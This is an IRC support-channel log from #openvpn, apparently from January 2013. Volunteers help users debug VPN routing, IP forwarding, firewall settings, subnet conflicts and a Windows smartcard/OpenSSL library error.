jgspratt1> I have it on my screen right this very moment, sir. 23:06 <+rob0> I don't, but I recall seeing something on it about enabling IP forwarding. 23:07 < jgspratt1> rob0: does http://hastebin.com/vecelijumu.coffee indicate that I'm doing it wrong? 23:07 <@vpnHelper> Title: hastebin (at hastebin.com) 23:12 <+rob0> does that say something about enabling IP forwarding on 10.25.1.101? What OS is 10.25.1.101? 23:13 < jgspratt1> 10.25.1.101 is Ubuntu 23:13 <+rob0> !linipforward 23:13 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT 23:13 <+rob0> "cat /proc/sys/net/ipv4/ip_forward" 23:16 < jgspratt1> Ok, I enabled ip forwarding on the openvpn server 23:17 < jgspratt1> I'm still getting a similar problem 23:18 < jgspratt1> Here's the client: http://hastebin.com/moxisolowe.rb 23:18 <@vpnHelper> Title: hastebin (at hastebin.com) 23:21 < jgspratt1> And the server is kind of freaking out route-wise: http://hastebin.com/voviludeho.vhdl 23:21 <@vpnHelper> Title: hastebin (at hastebin.com) 23:23 <@krzee> if you *just* enabled ip forwarding 23:24 <@krzee> after following the flowchart and stating that you enabled a route on the router (which comes after ip forwarding on the flowchart) 23:24 <@krzee> then you basically proved that following directions in order is not your strong suite 23:24 <@krzee> in which case, best of luck to ya dude, i doubt this is for you :-p 23:26 < jgspratt1> Well, you said to enable IP forwarding in my OpenVPN host which is not my firewall 23:26 < jgspratt1> At least, it's not what I call my firewall on a day-to-day basis. 23:26 < jgspratt1> That's what I call my SonicWALL. 23:27 <@krzee> do you know what ip forwarding is / does? 23:27 < jgspratt1> But, fair enough, you suggested to enable it on my Ubuntu machine so I did. 23:28 <@krzee> ip forwarding is needed on any machine that is expected to allow packets to traverse from 1 network device to another 23:28 < jgspratt1> I'm not sure what enabling that does, no, because this was working before I moved datacenters. It doesn't seem to be how this setup is intended to be by the guy who set it up originally. 23:28 <@krzee> whether that means your "ubuntu machine" is up to you to figure out -[ 23:28 <@krzee> =]* 23:29 < jgspratt1> Gotcha, so, promiscuous accepting of packets and forwarding them 23:29 <@krzee> promiscuous? 23:29 <@krzee> i think you just mis-used that word, but ok 23:29 < jgspratt1> Fair enough, sure. Anyway, it takes packets and routes them now. 23:30 < jgspratt1> Is it OK that I'm at the "Add a route to the router..." step now? 23:30 <@krzee> no idea 23:30 <@krzee> try starting over and following the directions 23:30 <@krzee> step by step, starting at the top 23:30 < jgspratt1> I'll go from the top, sure. 23:32 < jgspratt1> Yeah, I'm pretty sure I'm in the right spot. I can ping 172.16.0.8, which is the client VPN IP. 23:32 < jgspratt1> I pushed out the routes 23:33 < jgspratt1> I see the iroute config is correct: internal route 10.0.0.0/24 -> 23:33 < jgspratt1> Can I ping the lan IP of the client? no. 23:33 < jgspratt1> Turn on IP forwarding, done. 23:34 < jgspratt1> Can I ping the lan IP of the client? Still no. 23:34 <@krzee> check client firewall 23:34 <@krzee> also check ip forwarding in that firewall 23:34 < jgspratt1> Is my client my firewall also? 23:35 <@krzee> grrr i need one of my users to get around so we can test my shit! 23:35 <+rob0> any Linux machine can have an iptables firewall 23:35 < jgspratt1> Oh, now I see what you mean by firewall here. I was thinking appliance. 23:36 < jgspratt1> Ok, it was already set on the client to forward. 23:44 < jgspratt1> rob0: I'm still stuck with no ping. I've tried many settings. 23:59 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn --- Day changed Wed Jan 09 2013 00:00 < jgspratt1> rob0: now I'm getting this: http://hastebin.com/naxacariku.vbs 00:00 <@vpnHelper> Title: hastebin (at hastebin.com) 00:01 < jgspratt1> so, I can actually get from the east coast to the west coast. 00:01 < jgspratt1> going the oppoiste way seems to be the problem. 00:11 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 256 seconds] 00:12 -!- HyperGlide [~HyperGlid@182.151.60.13] has joined #openvpn 00:13 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 252 seconds] 00:16 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 248 seconds] 00:41 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 00:59 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has quit [Ping timeout: 256 seconds] 01:00 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 256 seconds] 01:01 -!- HyperGlide [~HyperGlid@182.151.60.13] has quit [Remote host closed the connection] 01:10 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 244 seconds] 01:28 -!- cornfeed [~cornfeed@unaffiliated/cornfeed] has quit [Ping timeout: 255 seconds] 01:29 -!- medum [kevin@2607:f2f8:a4c4::2] has quit [Ping timeout: 246 seconds] 01:30 -!- cornfeed [~cornfeed@unaffiliated/cornfeed] has joined #openvpn 01:31 -!- medum [kevin@n2l.org] has joined #openvpn 01:34 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has joined #openvpn 01:34 -!- winter_ [gigas@openvpn/user/winter] has quit [Quit: leaving] 01:41 -!- brute11k [~brute11k@89.249.235.33] has joined #openvpn 01:45 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 01:47 -!- ade_b [~Ade@95.209.134.79.bredband.tre.se] has joined #openvpn 01:47 -!- ade_b [~Ade@95.209.134.79.bredband.tre.se] has quit [Changing host] 01:47 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:02 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 246 seconds] 02:04 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Ping timeout: 246 seconds] 02:05 -!- Halagan [~Miranda@a4.evona.ba.cust.gts.sk] has joined #openvpn 02:22 < Halagan> Hi guys, i have a problem with Safenet iKey1032 problem with loging to vpn with certificate. We installed last version of iKey1000SDK (4.2.0) for iKey 1032 under OS Windows 7 x64. 02:22 < Halagan> App installed correctly and utility shows some information about token. 02:22 < Halagan> We have openvpn certificate on this iKey and we use this certificate to login in vpn site. 02:22 < Halagan> When we run openvpn client, it appear error with message “the ordinal 322 could not be located in the dynamic link library libeay32.dll”. So I copied this file and file ssleay32.dll from windows\system32 to openvpn\bin, where I replaced original openvpn files. Then i started again openvpn client, and opevpn daemon crash with error. We use openvpn-2.2.2-install.exe, but I have also tried version openvpn-install-2.3_rc1-I003-x86_6 02:22 < Halagan> 4.exe with the same results. Under OS Windows XP 32 bit with iKey1000SDK (4.0.0.4) run this certificate on token without problems. I tried to install the latest library openssl for 32 and 64 bit OS Windows from site http://slproweb.com/products/Win32OpenSSL.html, of course i installed additional recommended library (Visual C++ 2008 Redistributables x32 a x64). Please suggest me solution. Thanks. 02:25 <+pekster> Halagan: How are you starting OpenVPN? Are you using the OpenVPN GUI from your Windows tray icon? When you install OpenVPN, it uses its own bundled copy of OpenSSL so you don't need to install that seperately 02:28 < Halagan> I am starting OpenVPN with config file .ovpn. 02:29 <+pekster> Okay. It sounds like there might be a problem tying the smartcard you're using with the SSL library. I have 2 suggetsions: first, try downloading the latest 2.3.0 (just recently released the last couple of days) and see if that changes anything. 2nd, try using the 32-bit version, in case there's some 64/32-bit conflict with your smartcard libraries 02:30 <+pekster> I'm guessing at both of those solutions, but it doesn't sound like an OpenVPN issue, more like an issue interacting with the PKCS11 provider (ie: your smartcard.) 02:30 <+pekster> I assume you've already tested your smartcard on the client software, and it's working normally? 02:33 < Halagan> Under OS Windows XP client works fine without problems. You mean OpenSSL version 2.3.0 ? 02:33 <+pekster> No, you listed an OpenVPN "rc", or Release Candidate version. The official 2.3.0 version is now available for download 02:33 <+pekster> !download 02:33 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 02:33 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 02:34 <+pekster> If it's working under XP, your smartcard might only work properly with a 32-bit SSL library. You can't just replace the library with the one your smartcard suite uses becuase OpenVPN is compiled specifically against the version of the dll provided by the installer (ie: you can't just drop in a 32-bit version and expect your 64-bit OpenVPN.exe to work) 02:35 <+pekster> Try the 2.3.0 OpenVPN version for 32-bit, not 64. Completely uninstall your current OpenVPN version, then install that 02:35 <+pekster> It might just work 02:37 < Halagan> Okay, i try it. Thanks. If that does not work, the i'll bother again :-) 02:37 <+pekster> Well, if that doesn't work it's a more subtle (and harder to solve) problem 02:39 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 02:59 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 02:59 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 02:59 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 02:59 -!- mode/#openvpn [+o krzee] by ChanServ 03:01 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:14 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has joined #openvpn 03:21 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 248 seconds] 03:26 < IT> back 03:26 < IT> morning guys 03:37 -!- Suterusu1 [~EyeR@178.63.199.61] has joined #openvpn 03:37 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 03:38 -!- n2deep_ [n2deep@odin.sdf-eu.org] has joined #openvpn 03:40 < IT> @ecrist, major breakthrough, that route correction solved the problem and now i can ping between gateways 03:40 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has left #openvpn [] 03:42 -!- Netsplit *.net <-> *.split quits: Suterusu, nutron, n2deep 03:48 < IT> @ecrist, can't ping other machines behind the gateways tough :( 03:48 -!- ronsel [~ronsel@dslb-088-074-167-187.pools.arcor-ip.net] has joined #openvpn 03:49 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 03:49 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn 03:55 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 04:19 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 04:23 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Quit: leaving] 04:24 -!- pi_ [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn 04:24 -!- pi_ is now known as videl 04:29 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 260 seconds] 04:34 -!- dazo_afk is now known as dazo 04:42 < IT> i'm stuck at this particular step http://imagehost.pitestinet.ro/images/m1vdzvvgdwfduni6yi4.png can i have an example of this? 04:46 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 04:55 <@dazo> IT: you need to log into your router ... and add in an explicit route there of your VPN subnet and tell the router to send that traffic to your OpenVPN server's LAN IP 04:56 <@dazo> (that route will be an additional route to whatever you already have there) 04:56 <@dazo> how that is done on your router is out of the scope for this channel, though ... as we don't support routers here, just openvpn setups 04:58 <@dazo> krzee: ... I got an idea for your troubleshoot images .... add a number on each of the blocks ... then it's easier to point at which step people stops at 05:01 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 05:02 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer] 05:21 -!- Carbon_Monoxide [~cmonxide@116.92.14.130] has quit [Quit: Leaving] 05:27 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 05:29 -!- neverme [neverme@177.182.56.94] has joined #openvpn 05:30 < neverme> Hi, I would like to know if its possible to use a single Instance of OpenVPN with multiple public IPs ? Like I want client A to use the outbound IP 1, client B to use IP 2 and so on, or do I have to create 1 VPN to each IP ? 05:39 -!- neverme [neverme@177.182.56.94] has quit [Quit: Leaving] 05:48 < Rienzilla> is possible with one server instance I guess 05:54 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 06:05 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 06:07 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 06:11 < thermoman> why does easyrsa-2.0 create a 01.pem, 02.pem etc besides the name.crt files? 06:12 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Ping timeout: 248 seconds] 06:18 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 06:52 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 06:52 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Remote host closed the connection] 06:53 <@ecrist> IT: pastebin another traceroute from one LAN machine to a LAN machine on the other network. 07:04 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 07:08 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 07:09 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 07:10 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Client Quit] 07:11 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 07:15 < IT> ecrist: http://pastebin.com/7gJJfMb2 07:16 <@ecrist> IT: NOW is it a firewall issue? 07:16 < IT> i stopped the firewall ... 07:16 <@ecrist> !iptables 07:16 <@vpnHelper> "iptables" is (#1) to test if iptables is your problem, disable all rules or put the defaults to accept: iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FORWARD ACCEPT; iptables -F; iptables -Z or (#2) please see http://openvpn.net/man#lbBD for more info or (#3) you can see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for pf or iptables or (#4) These is just the 07:16 <@vpnHelper> basics to get OpenVPN working. Proper firewall design is beyond the scope of this channel. You can try #iptables 07:17 <@ecrist> can you pastebin your configs again? 07:19 < IT> ofc http://pastebin.com/BUxV6x8X 07:23 < IT> pfff 07:23 < IT> i'm such a retard, i forgot one firewall on LAN2 07:23 <@ecrist> the pastebin above (pings/traceroute) seems to indicate you can only ping from one side to the other, and not both directions 07:23 < IT> it's down, let me retest 07:23 < IT> aaaaaaaand it's working 07:23 <@ecrist> :) 07:23 <+rob0> yay 07:24 < IT> yes! 07:24 < IT> they are all working! :x:X:X:X 07:24 <@ecrist> quoting our /topic: Your problem is probably your firewall, really 07:24 <@ecrist> ;) 07:24 < IT> =)) 07:24 <@ecrist> IT: now, don't you feel better prepared to resolve future issues than if you'd paid someone to do it for you? 07:25 < IT> /respect level +1 for ecrist and rob0 07:25 < IT> hell yea 07:25 < |Mike|> lol 07:25 <@ecrist> !donate 07:25 <@vpnHelper> "donate" is (#1) send monetary donations to openvpn@secure-computing.net via paypal. All money donated goes to staff toward development of the community wiki, forum, and this IRC channel. or (#2) Contributions to this address do *NOT* directly benefit OpenVPN Technologies, Inc. or (#3) http://www.secure-computing.net/wiki/index.php/OpenVPN/Donations for Contribution totals and benefactors 07:25 < IT> took me 3 weeks to solve it, but atleast i got a good glipmse of it 07:29 <@ecrist> glad you got it working, IT 07:30 < IT> ecrist are you part of the staff? 07:30 <@ecrist> yes 07:31 <@ecrist> I run the community services, like IRC, the secure-computing wiki, and community infrastructure 07:31 < |Mike|> now he's going to make your an offer *g* :P 07:31 <@ecrist> I'm also the easy-rsa maintainer 07:32 < IT> check paypal in a few moments 07:32 < IT> thanks again 07:32 <@ecrist> also, feel free to check /msg chanserv info #openvpn 07:33 < IT> you lost me there, i'm a irc noob 07:35 < jgspratt1> Hello, I am having a problem with http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing and http://ircpimps.org/clientlan.png . client.conf: http://hastebin.com/qaciwiwugu.vala ; server.conf: http://hastebin.com/papugiroce.vala ; server networking: http://hastebin.com/tacimotaki.sm ; client networking: http://hastebin.com/butabiqore.sm 07:35 <@vpnHelper> Title: OpenVPN/Routing - Secure Computing Wiki (at www.secure-computing.net) 07:35 < jgspratt1> The problem is in the last link: I can't ping 10.25.1.102 from 10.0.0.10 07:36 < jgspratt1> interestingly, on another miscellaneous box on the server-side LAN, I can get to 10.0.0.10: http://hastebin.com/yibefikemo.vhdl 07:36 <@vpnHelper> Title: hastebin (at hastebin.com) 07:37 <@ecrist> IT, type /msg and the rest of that line 07:37 < jgspratt1> (and by "last link" I mean last URL posted) 07:37 < IT> done that :P 07:42 -!- valparaiso [~valparais@ARennes-257-1-179-35.w2-13.abo.wanadoo.fr] has joined #openvpn 07:42 -!- valparaiso [~valparais@ARennes-257-1-179-35.w2-13.abo.wanadoo.fr] has left #openvpn [] 07:42 < jgspratt1> In fact, the http://ircpimps.org/clientlan.png doesn't seem to cover my problem: I can answer "yes" to all of the questions now, and I get to "it works!" 07:43 < jgspratt1> But, the client can't get respnoses from arbitrary hosts on the server side 07:43 < jgspratt1> Is OpenVPN even able to do that? 07:43 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer] 07:44 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 07:48 < jgspratt1> Also, I don't understand why traceroute treats 10.25.1.101 and 10.25.1.102 differently in the trace. 07:48 < jgspratt1> http://hastebin.com/lisivovime.rb 07:48 <@vpnHelper> Title: hastebin (at hastebin.com) 08:06 <@ecrist> jgspratt1: firewall? 08:06 < jgspratt1> ecrist: iptables are off and I have included the ip forwarding in both the server and the client. 08:07 <@ecrist> !diagram 08:07 <@vpnHelper> "diagram" is You can use a site such as http://gliffy.com to create a network diagram as well as programs such as Visio, Dia, or OmniGraffle 08:09 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Operation timed out] 08:10 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 08:10 < jgspratt1> ecrist: http://hastebin.com/rotiyaqefa.1c 08:10 <@vpnHelper> Title: hastebin (at hastebin.com) 08:11 < jgspratt1> I had this all working before moving this data center to a new location and changing the IP addressing scheme on the server side to what it is now. 08:11 < jgspratt1> Basically, 10.25.1.102 can get to both clients, but 10.0.0.10 can only get to 10.25.1.101 08:14 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 08:16 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 246 seconds] 08:23 < jgspratt1> ecrist: so, do you think my problem is with the route on the router? "add a route to the router so it knows how to reach the vpn subnet" (from http://ircpimps.org/serverlan.png ) 08:23 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Quit: Leaving] 08:27 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 08:28 -!- ade_b [~Ade@109.58.166.181.bredband.tre.se] has joined #openvpn 08:28 -!- ade_b [~Ade@109.58.166.181.bredband.tre.se] has quit [Changing host] 08:28 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 08:29 -!- DX099 [~DX099@2a01:e35:2eaf:e400:3dee:8180:898d:1df2] has joined #openvpn 08:29 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 260 seconds] 08:29 < DX099> hello 08:29 < DX099> I have some problems connecting to some servers. My open-vpn client says something about timeout but I suspect port forwarding problems 08:30 < DX099> do I have to have some ports open ? How can I specify the server the range of ports that are available for it to connect to ? 08:30 <@ecrist> jgspratt1: can you post a traceroute for the failure? 08:31 < jgspratt1> ecrist: that's in http://hastebin.com/butabiqore.sm 08:31 <@vpnHelper> Title: hastebin (at hastebin.com) 08:31 < jgspratt1> "traceroute to 10.25.1.102" part starting at line 71 08:31 < jgspratt1> What should be in my ccd/ file for this client? 08:31 <@ecrist> when you say "10.25.1.102 can get to both clients" what do you mean? 08:32 < jgspratt1> I mean it can ping/ssh to 10.0.0.10 and 10.0.0.18 08:33 <@ecrist> which pastebin has your configs? 08:34 < jgspratt1> client.conf: http://hastebin.com/qaciwiwugu.vala ; server.conf: http://hastebin.com/papugiroce.vala 08:34 <@ecrist> is ip_forwarding enabled on your vpn server? 08:34 <@vpnHelper> Title: hastebin (at hastebin.com) 08:34 < jgspratt1> yes 08:34 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 08:34 <@ecrist> ugh 08:34 <@ecrist> !configs 08:34 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 08:35 <@ecrist> I'll put up with them for now, but in the future, remove all the comments 08:35 < jgspratt1> Thanks, will do. 08:35 < IT> does openvpn has any bandwight limitation buildin? 08:36 <@ecrist> you need to add the line route 10.24.0.0 255.248.0.0 to your server config 08:36 < jgspratt1> Most recently, I had http://hastebin.com/webisidano.hs as my ccd file for the lone client 08:36 <@vpnHelper> Title: hastebin (at hastebin.com) 08:36 <@ecrist> you're pushing it, but you're not allowing openvpn to route it 08:36 <@ecrist> so, VPN clients are sending traffic to the VPN server for the subnet, but the server is dropping the traffic 08:37 < jgspratt1> oh, that makes sense. so, openvpn doesn't just "use" the linux routes? 08:37 <@ecrist> not internally 08:37 < jgspratt1> how can I see what routes it is using interally? is there a command for that? 08:38 <@ecrist> how about you just trust me 08:38 <@ecrist> it's using what you tell it to use in the config 08:40 < jgspratt1> Sounds good. Ok, I set that up, shipped the conf file, and restarted the server and client. Same issue. 08:41 <@ecrist> show me the new config, please 08:41 <@ecrist> and the CCD 08:41 <@ecrist> also 08:41 <@ecrist> !logs 08:41 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 08:45 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Ping timeout: 260 seconds] 08:46 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 260 seconds] 08:46 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 08:46 -!- mode/#openvpn [+v hazardous] by ChanServ 08:47 < jgspratt1> new server.conf: http://hastebin.com/cahixuxace.hs ; current ccd: http://hastebin.com/webisidano.hs ; server log: http://hastebin.com/qixihofogu.vbs ; client log: http://hastebin.com/juyifanobi.md 08:47 <@vpnHelper> Title: hastebin (at hastebin.com) 08:50 < jgspratt1> Is that CCD route wrong? 08:50 < jgspratt1> I tried taking it out just now. 08:50 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 08:50 < jgspratt1> If I take it out, the client logs this: http://hastebin.com/jasogemaho.pas 08:50 <@vpnHelper> Title: hastebin (at hastebin.com) 08:50 * ecrist looks 08:51 <@ecrist> jgspratt1: for every push "route..." you have, you need a corresponding route line 08:52 <@ecrist> also, your version of OpenVPN is out of date 08:52 < jgspratt1> ecrist: ok, fair enough, how's this: http://hastebin.com/yexerafipa.hs 08:52 <@vpnHelper> Title: hastebin (at hastebin.com) 08:53 <@ecrist> jgspratt1: did you see line 34 in your server log? 08:53 <@ecrist> that's probably your routing issue 08:54 < jgspratt1> Oh, good call. How did I create that overlap? 08:54 <@ecrist> you tell me 08:54 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 240 seconds] 08:55 < jgspratt1> Well, I specify that the local VPN has a range of 10.24.0.0/255.248.0.0 08:55 < jgspratt1> But the remote VPN is 10.0.0.0/24 08:55 <@ecrist> yeah, there's your overlap 08:55 < jgspratt1> But it says the "remote" VPN is in issue. 08:55 -!- MarKsaitis_ [~MarKsaiti@81.101.81.114] has joined #openvpn 08:56 <@ecrist> openvpn seems to thing you're using 10.24.0.0/255.248.0.0 08:56 < jgspratt1> That's on a different LAN, right? 08:56 < jgspratt1> That's the entire local LAN, yes. 08:56 < jgspratt1> I want hosts to be able to get there. 08:56 -!- MarKsaitis_ [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer] 08:56 < jgspratt1> From the remote side. 08:56 <@ecrist> i've gotta scoot for a bit, bbl 08:57 < jgspratt1> If I want to achieve http://hastebin.com/rotiyaqefa.1c where each host on that network can get to any other host, what's wrong with my config? 08:57 <@vpnHelper> Title: hastebin (at hastebin.com) 08:58 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Operation timed out] 08:59 < jgspratt1> I should add to that diagram a bit: http://hastebin.com/mubijulata.1c 09:00 <@vpnHelper> Title: hastebin (at hastebin.com) 09:00 < jgspratt1> Can someone suggest a server config that would achieve this? 09:02 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 09:05 -!- niervol [~krystian@193.106.244.150] has quit [Remote host closed the connection] 09:10 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 09:11 < jgspratt1> How does what I'm doing disagree with what http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing is suggesting? 09:11 <@vpnHelper> Title: OpenVPN/Routing - Secure Computing Wiki (at www.secure-computing.net) 09:18 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:19 -!- jgspratt [~jgspratt@66.162.71.166] has joined #openvpn 09:19 -!- jgspratt1 [~jgspratt@66.162.71.166] has quit [Read error: Connection reset by peer] 09:22 -!- chrisb [~chrisb@li482-205.members.linode.com] has quit [Ping timeout: 246 seconds] 09:28 -!- chrisb [~chrisb@li482-205.members.linode.com] has joined #openvpn 09:28 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 09:31 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Client Quit] 09:35 -!- Konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 09:35 -!- Konigsberg7 [~mIRC@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 09:37 -!- DX099 [~DX099@2a01:e35:2eaf:e400:3dee:8180:898d:1df2] has quit [Quit: DX099] 09:38 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 09:38 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 09:38 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 09:38 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Remote host closed the connection] 09:38 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 09:39 < jgspratt> How does what I'm doing disagree with what http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing is suggesting? 09:39 <@vpnHelper> Title: OpenVPN/Routing - Secure Computing Wiki (at www.secure-computing.net) 09:42 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Client Quit] 09:42 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 09:42 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 09:42 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 09:42 -!- Konigsberg7 [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Excess Flood] 09:42 -!- Konigsberg [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has joined #openvpn 09:46 < jgspratt> Can someone suggest a server config that would achieve this? 09:46 < jgspratt> I'm trying to be able to ping from 10.0.0.10 to 10.25.1.102: http://hastebin.com/mubijulata.1c 09:46 <@vpnHelper> Title: hastebin (at hastebin.com) 09:48 < |Mike|> !configs jgspratt 09:48 < |Mike|> !tell jgspratt configs 09:49 < |Mike|> hrm, syntax changed? 09:49 < jgspratt> |Mike| wants me to tell you: configs 09:49 < jgspratt> But, sure, I can repost them, hang on. 09:49 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 09:49 < |Mike|> !configs 09:49 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 09:49 < |Mike|> !logs 09:49 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 09:50 < jgspratt> server: http://hastebin.com/yexerafipa.hs ; current ccd: http://hastebin.com/webisidano.hs ; server log: http://hastebin.com/qixihofogu.vbs ; client log: http://hastebin.com/juyifanobi.md 09:50 <@vpnHelper> Title: hastebin (at hastebin.com) 09:50 < jgspratt> I've also tried the ccd as just "iroute 10.0.0.0 255.255.255.0" 09:52 < jgspratt> Is what I'm trying to do possible with OpenVPN or do I need something commercial? 09:52 < jgspratt> I see the warning "WARNING: potential route subnet conflict between local LAN [10.25.1.0/255.255.255.0] and remote VPN [10.24.0.0/255.248.0.0]" 09:52 < jgspratt> That must come from push "route 10.24.0.0 255.248.0.0" ; route 10.24.0.0 255.248.0.0 09:53 < jgspratt> However, those 